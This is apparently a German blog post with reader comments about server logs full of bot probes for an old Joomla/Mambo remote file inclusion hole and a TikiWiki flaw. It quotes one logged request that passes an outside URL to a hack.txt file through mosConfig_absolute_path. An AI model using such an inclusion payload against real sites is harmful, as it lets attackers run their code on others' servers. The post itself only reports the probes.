Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:
/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt
Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.
Kann ich nur Bestätigen (die Einbruchsversuche)… allerdings scheinen die Täter nicht viel Know-How zu besitzen…
Ich möchte ja fast diese dilletantistischen Momente so richtig an den Pranger stellen und die IPs preisgeben, aber näää… :P
Ich veröffentliche manchmal Anweisungen für die .htaccess-Datei… das befriedigt auch ;-)
Diese bots tun nix, die wollen nur spielen. grep mal nach tikiwiki.
So, ick muss twittern.
Mir graut es jedesmal wenn ich in meine Logfiles schaue. Was da an “Angriffen” reinkommt ist nicht mehr lustig und es wird subjektiv immer mehr.
@Moellus:
Ist das gemeint: “Eine Schwachstelle in TikiWiki 1.9.8 kann von einem Angreifer dazu ausgenutzt werden, beliebigen Programmcode auf dem beherbergenden Rechnersystem auszuführen. Es ist bereits funktionierender Exploit Code in Umlauf und die Schwachstelle wird bereits aktiv ausgenutzt. Es ist noch kein Patch verfügbar, …”?
Och - das ist ne alte Lücke… müsste aber schon lange gestopft sein… (wobei denkbar währe, dass es eigentlich eher ne Mambo Lücke war - kann ich aber nicht genau sagen) so ungefähr seit Joomla eine Register Globals = “Off” Emulation hat ;-)
“allerdings scheinen die Täter nicht viel Know-How zu besitzen…”
Glaubst du? Es ist weniger Aufwand den “Hack”versuch direkt zu begehen, als erst die Startseite zu laden und zu versuchen herauszufinden, ob denn das Zielsystem installiert ist.
Was IPs angeht… Botnetze und Zobierechner sowie wechselnde IPs machen einem das Leben manchmal zur Hölle, wenn man IPs blocken möchte ;-)